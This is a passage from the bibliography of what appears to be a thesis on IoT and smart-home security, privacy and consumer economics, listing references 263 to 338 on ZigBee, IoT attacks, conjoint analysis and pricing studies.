Sawtooth Software Technical Paper Series, 2017. [Online]. Available: https://www. sawtoothsoftware.com/download/techpap/cbctech.pdf [263] B. Schneier, “Testimony of Bruce Schneier [...] before the U.S. House of Representatives [...] joint hearing entitled “Understanding the role of connected devices in recent cyber attacks”,” November 2016. [Online]. Available: https://docs.house.gov/meetings/IF/IF17/20161116/105418/HHRG- 114-IF17-Wstate-SchneierB-20161116.pdf [264] A. Scholl, L. Manthey, R. Helm, and M. Steiner, “Solving multiattribute design problems with analytic hierarchy process and conjoint analysis: An empirical comparison,” European Journal of Operational Research, vol. 164, no. 3, pp. 760–777, 2005. [Online]. Available: http://www.sciencedirect.com/science/article/ pii/S0377221704000700 [265] V. Sharma, K. Lee, S. Kwon, J. Kim, H. Park, K. Yim, and S. Lee, “A consensus framework for reliability and mitigation of zero-day attacks in IoT,” Security and Communication Networks, vol. 2017, pp. 1–24, 2017. [Online]. Available: https://doi.org/10.1155/2017/4749085 [266] D. Shepardson, “U.S. judge approves $14.7 billion deal in VW diesel scandal,” Reuters, October 2016. [Online]. Available: http://www.reuters.com/article/us- volkswagen-emissions-idUSKCN12P22F [267] Y. Shiyanovskii, F. G. Wolff, A. Rajendran, C. A. Papachristou, D. J. Weyer, and W. Clay, “Process reliability based trojans through NBTI and HCI effects,” in 2010 NASA/ESA Conference on Adaptive Hardware and Systems, AHS 2010, Anaheim, California, USA, June 15-18, 2010, T. Arslan, D. Keymeulen, D. Merodio, K. Benkrid, A. T. Erdogan, and U. D. Patel, Eds. IEEE Computer Society, 2010, pp. 215–222. [Online]. Available: https://doi.org/10.1109/AHS.2010.5546257

[268] A. Shostack, Threat modeling: Designing for security. John Wiley & Sons, 2014. [269] D. Shreenivas, S. Raza, and T. Voigt, “Intrusion detection in the RPL-connected 6LoWPAN networks,” in Proceedings of the 3rd ACM International Workshop on IoT Privacy, Trust, and Security, IoTPTS@AsiaCCS 2017, Abu Dhabi, United Arab Emirates, April 2, 2017, R. Chow and G. Saldamli, Eds. ACM, 2017, pp. 31–38. [Online]. Available: http://doi.acm.org/10.1145/3055245.3055252 [270] S. Siby, R. R. Maiti, and N. O. Tippenhauer, “IoTScanner: Detecting privacy threats in IoT neighborhoods,” in Proceedings of the 3rd ACM International Workshop on IoT Privacy, Trust, and Security, IoTPTS@AsiaCCS 2017, Abu Dhabi, United Arab Emirates, April 2, 2017, R. Chow and G. Saldamli, Eds. ACM, 2017, pp. 23–30. [Online]. Available: http://doi.acm.org/10.1145/3055245.3055253 [271] Sigfox, “SIGFOX expanding IoT network in 100 U.S. cities,” February 2017. [Online]. Available: https://www.sigfox.com/en/news/sigfox-expanding-iot- network-100-us-cities

180 Bibliography

[272] A. K. Sikder, H. Aksu, and A. S. Uluagac, “6thSense: A context-aware sensor-based attack detector for smart devices,” in 26th USENIX Security Symposium, USENIX Security 2017, Vancouver, BC, Canada, August 16-18, 2017., E. Kirda and T. Ristenpart, Eds. USENIX Association, 2017, pp. 397–414. [Online]. Available: https://www.usenix.org/conference/usenixsecurity17/technical- sessions/presentation/sikder

[273] H. Sinanovic and S. Mrdovic, “Analysis of Mirai malicious software,” in 25th International Conference on Software, Telecommunications and Computer Networks, SoftCOM 2017, Split, Croatia, September 21-23, 2017, D. Begusic, N. Rozic, J. Radic, and M. Saric, Eds. IEEE, 2017, pp. 1–5. [Online]. Available: https://doi.org/10.23919/SOFTCOM.2017.8115504

[274] V. Sivaraman, D. Chan, D. Earl, and R. Boreli, “Smart-phones attacking smart-homes,” in Proceedings of the 9th ACM Conference on Security & Privacy in Wireless and Mobile Networks, WISEC 2016, Darmstadt, Germany, July 18-22, 2016, M. Hollick, P. Papadimitratos, and W. Enck, Eds. ACM, 2016, pp. 195–200. [Online]. Available: http://doi.acm.org/10.1145/2939918.2939925

[275] S. Soltan, P. Mittal, and H. V. Poor, “BlackIoT: IoT botnet of high wattage devices can disrupt the power grid,” in 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, August 15-17, 2018., W. Enck and A. P. Felt, Eds. USENIX Association, 2018, pp. 15–32. [Online]. Available: https://www.usenix.org/conference/usenixsecurity18/presentation/soltan

[276] S. Spiekermann, A. Acquisti, R. B¨ohme,and K. L. Hui, “The challenges of personal data markets and privacy,” Electronic Markets, vol. 25, no. 2, pp. 161–167, 2015. [Online]. Available: https://doi.org/10.1007/s12525-015-0191-0

[277] G. Sprint, D. J. Cook, R. Fritz, and M. Schmitter-Edgecombe, “Detecting health and behavior change by analyzing smart home sensor data,” in 2016 IEEE International Conference on Smart Computing, SMARTCOMP 2016, St Louis, MO, USA, May 18-20, 2016. IEEE Computer Society, 2016, pp. 1–3. [Online]. Available: https://doi.org/10.1109/SMARTCOMP.2016.7501687

[278] Statista, “Smart home report 2019,” December 2018. [Online]. Available: https://www.statista.com/study/42112/smart-home-report/

[279] J.-B. E. Steenkamp and D. R. Wittink, “The metric quality of full-profile judgments and the number-of-attribute-levels effect in conjoint analysis,” International Journal of Research in Marketing, vol. 11, no. 3, pp. 275–286, 1994. [Online]. Available: http://www.sciencedirect.com/science/article/pii/016781169490006X

[280] M. Steiner, N. Wiegand, A. Eggert, and K. Backhaus, “Platform adoption in system markets: The roles of preference heterogeneity and consumer expectations,” International Journal of Research in Marketing, vol. 33, no. 2, pp.

181 Bibliography

276–296, 2016. [Online]. Available: http://www.sciencedirect.com/science/article/ pii/S0167811615000762 [281] STMicroelectronics, “STM32F303CB datasheet,” May 2016. [Online]. Available: https://www.st.com/resource/en/datasheet/stm32f303vc.pdf [282] ——, “STM32Cube initialization code generator datasheet,” July 2017. [Online]. Available: https://www.st.com/en/development-tools/stm32cubemx.html [283] C. Sturton, M. Hicks, D. A. Wagner, and S. T. King, “Defeating UCI: Building stealthy and malicious hardware,” in 32nd IEEE Symposium on Security and Privacy, S&P 2011, 22-25 May 2011, Berkeley, California, USA. IEEE Computer Society, 2011, pp. 64–77. [Online]. Available: https://doi.org/10.1109/SP.2011.32 [284] G. M. P. Swann, “The economics of standardization,” University of Manchester, Manchester, UK, December 2000. [Online]. Available: http://citeseerx.ist.psu.edu/ viewdoc/download?doi=10.1.1.430.1657&rep=rep1&type=pdf [285] The Secretary of Commerce and The Secretary of Homeland Security, “A report to the President on enhancing the resilience of the Internet and communications ecosystem against botnets and other automated, distributed threats,” May 2018. [Online]. Available: https://www.commerce.gov/sites/commerce.gov/files/media/ files/2018/eo 13800 botnet report - finalv2.pdf [286] M. Thomas and V. Morwitz, “Penny wise and Pound foolish: The left-digit effect in price cognition,” Journal of Consumer Research, vol. 32, no. 1, pp. 54–64, June 2005. [Online]. Available: https://dx.doi.org/10.1086/429600 [287] P. Thubert, C. Bormann, L. Toutain, and R. Cragie, “IPv6 over low-power wireless personal area network (6LoWPAN) routing header,” Internet Engineering Task Force (IETF) - Request for Comments: 8138, April 2017. [Online]. Available: https://tools.ietf.org/html/rfc8138 [288] S. Tomasin, S. Zulian, and L. Vangelista, “Security analysis of LoRaWAN join procedure for Internet of Things networks,” in 2017 IEEE Wireless Communications and Networking Conference Workshops, WCNC Workshops 2017, San Francisco, CA, USA, March 19-22, 2017. IEEE, 2017, pp. 1–6. [Online]. Available: https://doi.org/10.1109/WCNCW.2017.7919091 [289] S. Torabi, E. Bou-Harb, C. Assi, M. Galluscio, A. Boukhtouta, and M. Debbabi, “Inferring, characterizing, and investigating Internet-scale malicious IoT device activities: A network telescope perspective,” in 48th Annual IEEE/IFIP International Conference on Dependable Systems and Networks, DSN 2018, Luxembourg City, Luxembourg, June 25-28, 2018. IEEE Computer Society, 2018, pp. 562–573. [Online]. Available: https://doi.org/10.1109/DSN.2018.00064 [290] P. Torr, “Demystifying the threat-modeling process,” IEEE Security & Privacy, vol. 3, no. 5, pp. 66–70, 2005. [Online]. Available: https://doi.org/10.1109/MSP. 2005.119

182 Bibliography

[291] J. Y. Tsai, S. Egelman, L. F. Cranor, and A. Acquisti, “The effect of online privacy information on purchasing behavior: An experimental study,” Information Systems Research, vol. 22, no. 2, pp. 254–268, 2011. [Online]. Available: https://doi.org/10.1287/isre.1090.0260 [292] Y. Tu, Z. Lin, I. Lee, and X. Hei, “Injected and delivered: Fabricating implicit control over actuation systems by spoofing inertial sensors,” in 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, August 15-17, 2018., W. Enck and A. P. Felt, Eds. USENIX Association, 2018, pp. 1545–1562. [Online]. Available: https://www.usenix.org/conference/usenixsecurity18/presentation/tu [293] Twitter, “MayaZigBee,” March 2015. [Online]. Available: https://twitter.com/ mayazigbee

[294] UN General Assembly, “Universal Declaration of Human Rights,” UN General As- sembly, 1948. [295] J. Valente and A. A. C´ardenas, “Security & privacy in smart toys,” in Proceedings of the 2017 Workshop on Internet of Things Security and Privacy, IoT S&P@CCS, Dallas, TX, USA, November 03, 2017, P. Liu, Y. Zhang, T. Benson, and S. Sundaresan, Eds. ACM, 2017, pp. 19–24. [Online]. Available: http://doi.acm.org/10.1145/3139937.3139947 [296] T. van Kasteren, A. K. Noulas, G. Englebienne, and B. J. A. Kr¨ose, “Accurate activity recognition in a home setting,” in UbiComp 2008: Ubiquitous Computing, 10th International Conference, UbiComp 2008, Seoul, Korea, September 21-24, 2008, Proceedings, ser. ACM International Conference Proceeding Series, H. Y. Youn and W. Cho, Eds., vol. 344. ACM, 2008, pp. 1–9. [Online]. Available: https://doi.org/10.1145/1409635.1409637 [297] K. Vaniea, E. J. Rader, and R. Wash, “Betrayed by updates: How negative experiences affect future security,” in CHI Conference on Human Factors in Computing Systems, CHI’14, Toronto, ON, Canada - April 26 - May 01, 2014, M. Jones, P. A. Palanque, A. Schmidt, and T. Grossman, Eds. ACM, 2014, pp. 2671–2674. [Online]. Available: http://doi.acm.org/10.1145/2556288.2557275 [298] K. Vaniea and Y. Rashidi, “Tales of software updates: The process of updating software,” in Proceedings of the 2016 CHI Conference on Human Factors in Computing Systems, San Jose, CA, USA, May 7-12, 2016, J. Kaye, A. Druin, C. Lampe, D. Morris, and J. P. Hourcade, Eds. ACM, 2016, pp. 3215–3226. [Online]. Available: http://doi.acm.org/10.1145/2858036.2858303 [299] V. Venkatesh, J. Y. L. Thong, and X. Xu, “Consumer acceptance and use of information technology: Extending the unified theory of acceptance and use of technology,” MIS Quarterly, vol. 36, no. 1, pp. 157–178, 2012. [Online]. Available: http://www.jstor.org/stable/41410412 [300] P. Vervier and Y. Shen, “Before toasters rise up: A view into the emerging

183 Bibliography

IoT threat landscape,” in Research in Attacks, Intrusions, and Defenses - 21st International Symposium, RAID 2018, Heraklion, Crete, Greece, September 10-12, 2018, Proceedings, ser. Lecture Notes in Computer Science, M. Bailey, T. Holz, M. Stamatogiannakis, and S. Ioannidis, Eds., vol. 11050. Springer, 2018, pp. 556–576. [Online]. Available: https://doi.org/10.1007/978-3-030-00470-5 26

[301] N. Vidgren, K. Haataja, J. L. Patino-Andres, J. J. Ramirez-Sanchis, and P. Toivanen, “Security threats in ZigBee-enabled systems: Vulnerability evaluation, practical experiments, countermeasures, and lessons learned,” in 46th Hawaii International Conference on System Sciences, HICSS 2013, Wailea, HI, USA, January 7-10, 2013. IEEE, 2013, pp. 5132–5138. [Online]. Available: http://dx.doi.org/10.1109/HICSS.2013.475

[302] F. V¨olckner, “The dual role of price: Decomposing consumers’ reactions to price,” Journal of the Academy of Marketing Science, vol. 36, no. 3, pp. 359–377, September 2008. [Online]. Available: https://doi.org/10.1007/s11747-007-0076-7

[303] S. Voleti, V. Srinivasan, and P. Ghosh, “An approach to improve the predictive power of choice-based conjoint analysis,” International Journal of Research in Marketing, vol. 34, no. 2, pp. 325–335, 2017. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0167811616301161

[304] P. Waide, “Monitoring of energy efficiency trends of refrigerators, freezers, washing machines and washer-driers sold in the EU,” PW Consulting for ADEME on behalf of the European Commission (SAVE). PW Consulting: Manchester, 2001. [305] K. L. Wakefield and J. Inman, “Situational price sensitivity: The role of consumption occasion, social context and income,” Journal of Retailing, vol. 79, no. 4, pp. 199–212, 2003. [Online]. Available: http://www.sciencedirect.com/ science/article/pii/S0022435903000551

[306] Q. Wang, W. U. Hassan, A. M. Bates, and C. A. Gunter, “Fear and logging in the Internet of Things,” in 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018. The Internet Society, 2018. [Online]. Available: http://wp.internetsociety.org/ndss/wp- content/uploads/sites/25/2018/02/ndss2018 01A-2 Wang paper.pdf

[307] M. R. Warner, “S.1691 - Internet of Things (IoT) Cybersecurity Improvement Act of 2017,” August 2017. [Online]. Available: https://www.congress.gov/bill/115th- congress/senate-bill/1691/text

[308] M. Weyrich and C. Ebert, “Reference architectures for the Internet of Things,” IEEE Software, vol. 33, no. 1, pp. 112–116, 2016. [Online]. Available: https://doi.org/10.1109/MS.2016.20

[309] A. Wilkins, J. Veitch, and B. Lehman, “LED lighting flicker and potential health concerns: IEEE standard PAR1789 update,” in 2010 IEEE Energy Conversion

184 Bibliography

Congress and Exposition, September 2010, pp. 171–178. [Online]. Available: https://doi.org/10.1109/ECCE.2010.5618050

[310] J. Winward, P. Schiellerup, and B. Boardman, Cool labels: The first three years of the European energy label. Energy and Environment Programme, Environmental Change Unit, University of Oxford, 1998. [Online]. Available: https://www.eci.ox. ac.uk/research/energy/downloads/coollabels.pdf

[311] I. H. Witten, E. Frank, and M. A. Hall, Data mining: Practical machine learning tools and techniques, 3rd Edition. Morgan Kaufmann, Elsevier, 2011. [Online]. Available: http://www.worldcat.org/oclc/262433473 [312] D. R. Wittink, M. Vriens, and W. Burhenne, “Commercial use of conjoint analysis in Europe: Results and critical reflections,” International Journal of Research in Marketing, vol. 11, no. 1, pp. 41–52, 1994. [Online]. Available: http://www.sciencedirect.com/science/article/pii/0167811694900337 [313] World Bank, “Households and NPISHs Final consumption expenditure,” 2016. [Online]. Available: https://data.worldbank.org/indicator/NE.CON.PRVT.CD [314] D. W¨orner,T. von Bomhard, M. Roeschlin, and F. Wortmann, “Look twice: Uncover hidden information in room climate sensor data,” in 4th International Conference on the Internet of Things, IoT 2014, Cambridge, MA, USA, October 6-8, 2014. IEEE, 2014, pp. 25–30. [Online]. Available: http://dx.doi.org/10.1109/IOT.2014.7030110 [315] J. Wright, “KillerBee: Practical ZigBee exploitation framework,” 2009, ToorCon 11. [Online]. Available: http://www.willhackforsushi.com/presentations/toorcon11- wright.pdf [316] K. Wuyts, “Privacy threats in software architectures,” Ph.D. dissertation, KU Leuven – Faculty of Engineering Science, 2015. [Online]. Available: https://lirias.kuleuven.be/retrieve/295669 [317] M. Wynn, K. Tillotson, R. Kao, A. Calderon, A. F. Murillo, J. Camargo, R. Mantilla, B. Rangel, A. A. C´ardenas,and S. J. Rueda, “Sexual intimacy in the age of smart devices: Are we practicing safe IoT?” in Proceedings of the 2017 Workshop on Internet of Things Security and Privacy, IoT S&P@CCS, Dallas, TX, USA, November 03, 2017, P. Liu, Y. Zhang, T. Benson, and S. Sundaresan, Eds. ACM, 2017, pp. 25–30. [Online]. Available: http://doi.acm.org/10.1145/3139937.3139942 [318] K. Yang, M. Hicks, Q. Dong, T. M. Austin, and D. Sylvester, “A2: analog malicious hardware,” in IEEE Symposium on Security and Privacy, SP 2016, San Jose, CA, USA, May 22-26, 2016. IEEE Computer Society, 2016, pp. 18–37. [Online]. Available: https://doi.org/10.1109/SP.2016.10 [319] W. Yang, N. Li, Y. Qi, W. H. Qardaji, S. E. McLaughlin, and P. D. McDaniel, “Minimizing private data disclosures in the smart grid,” in the ACM Conference on Computer and Communications Security, CCS’12, Raleigh, NC, USA, October

185 Bibliography

16-18, 2012, T. Yu, G. Danezis, and V. D. Gligor, Eds. ACM, 2012, pp. 415–427. [Online]. Available: https://doi.org/10.1145/2382196.2382242 [320] Z. Yang, N. Li, B. Becerik-Gerber, and M. D. Orosz, “A systematic approach to occupancy modeling in ambient sensor-rich buildings,” Simulation, vol. 90, no. 8, pp. 960–977, 2014. [Online]. Available: http://dx.doi.org/10.1177/0037549713489918 [321] M. Ye, N. Jiang, H. Yang, and Q. Yan, “Security analysis of Internet-of-Things: A case study of august smart lock,” in 2017 IEEE Conference on Computer Communications Workshops, INFOCOM Workshops, Atlanta, GA, USA, May 1-4, 2017. IEEE, 2017, pp. 499–504. [Online]. Available: https://doi.org/10.1109/ INFCOMW.2017.8116427 [322] E. Zeng, S. Mare, and F. Roesner, “End user security and privacy concerns with smart homes,” in Thirteenth Symposium on Usable Privacy and Security, SOUPS 2017, Santa Clara, CA, USA, July 12-14, 2017. USENIX Association, 2017, pp. 65– 80. [Online]. Available: https://www.usenix.org/conference/soups2017/technical- sessions/presentation/zeng [323] K. Zhang, J. Ni, K. Yang, X. Liang, J. Ren, and X. S. Shen, “Security and privacy in smart city applications: Challenges and solutions,” IEEE Communications Magazine, vol. 55, no. 1, pp. 122–129, 2017. [Online]. Available: https://doi.org/10.1109/MCOM.2017.1600267CM [324] R. Zhang, K. P. Lam, Y. Chiou, and B. Dong, “Information-theoretic environment features selection for occupancy detection in open office spaces,” Building Simulation, vol. 5, no. 2, pp. 179–188, 2012. [Online]. Available: http://dx.doi.org/10.1007/s12273-012-0075-6 [325] Z. Zhang, M. C. Y. Cho, and S. Shieh, “Emerging security threats and countermeasures in IoT,” in Proceedings of the 10th ACM Symposium on Information, Computer and Communications Security, ASIA CCS ’15, Singapore, April 14-17, 2015, F. Bao, S. Miller, J. Zhou, and G. Ahn, Eds. ACM, 2015, pp. 1–6. [Online]. Available: http://doi.acm.org/10.1145/2714576.2737091

[326] ZigBee Alliance, ZigBee Building Automation Standard Version 1.0 – Document 053516r12, May 2011. [Online]. Available: https://www.zigbee.org/zigbee-for- developers/applicationstandards/zigbee-building-automation/

[327] ——, ZigBee Light Link Standard Version 1.0 – Document 11-0037-10, April 2012. [Online]. Available: https://www.zigbee.org/zigbee-for-developers/ applicationstandards/zigbee-light-link/

[328] ——, Smart Energy Profile 2 Application Protocol Standard – Document 13-0200-00, April 2013. [Online]. Available: https://www.zigbee.org/download/standard-smart- energy-profile-2-0/

[329] ——, ZigBee Home Automation Public Application Profile Version 1.2 – Document

186 Bibliography

05-3520-29, June 2013. [Online]. Available: https://www.zigbee.org/zigbee-for- developers/applicationstandards/zigbeehomeautomation/

[330] ——, Base Device Behavior Specification Version 1.0 – Document 13-0402-13, February 2016. [Online]. Available: http://www.zigbee.org/wp-content/uploads/ 2014/10/docs-13-0402-13-00zi-Base-Device-Behavior-Specification-2.pdf [331] ——, “ZigBee Alliance accelerates IoT unification with 20 ZigBee 3.0 platform certifications,” December 2016. [Online]. Available: http://www.zigbee.org/zigbee- alliance-accelerates-iot-unification-with-20-zigbee-3-0-platform-certifications/

[332] ——, ZigBee Cluster Library Specification Revision 6 – Document 07-5123-06, January 2016. [Online]. Available: http://www.zigbee.org/∼zigbeeor/wp- content/uploads/2014/10/07-5123-06-zigbee-cluster-library-specification.pdf [333] ——, “The ZigBee Alliance to unveil universal language for the IoT from CES 2017,” January 2017. [Online]. Available: http://www.zigbee.org/the-zigbee- alliance-to-unveil-universal-language-for-the-iot-from-ces-2017-making-it-possible- for-smart-objects-to-work-together-on-any-network/ [334] ——, “ZigBee Certified Products,” 2017. [Online]. Available: http://www.zigbee. org/zigbee-products-2/ [335] ——, “Join the ZigBee Alliance and shape the future of the Internet of Things,” 2018. [Online]. Available: http://www.zigbee.org/zigbeealliance/join/

[336] ZigBee Standards Organization, ZigBee Specification – Document 053474r20, September 2012. [337] T. Zillner and S. Strobl, “ZigBee exploited – The good, the bad and the ugly,” 2015, Black Hat USA. [Online]. Available: https://www.blackhat.com/docs/us-15/ materials/us-15-Zillner-ZigBee-Exploited-The-Good-The-Bad-And-The-Ugly.pdf [338] L. Zimmermann, R. Weigel, and G. Fischer, “Fusion of nonintrusive environmental sensors for occupancy detection in smart homes,” IEEE Internet of Things Journal, vol. 5, no. 4, pp. 2343–2352, Aug 2018. [Online]. Available: https://doi.org/10.1109/JIOT.2017.2752134

187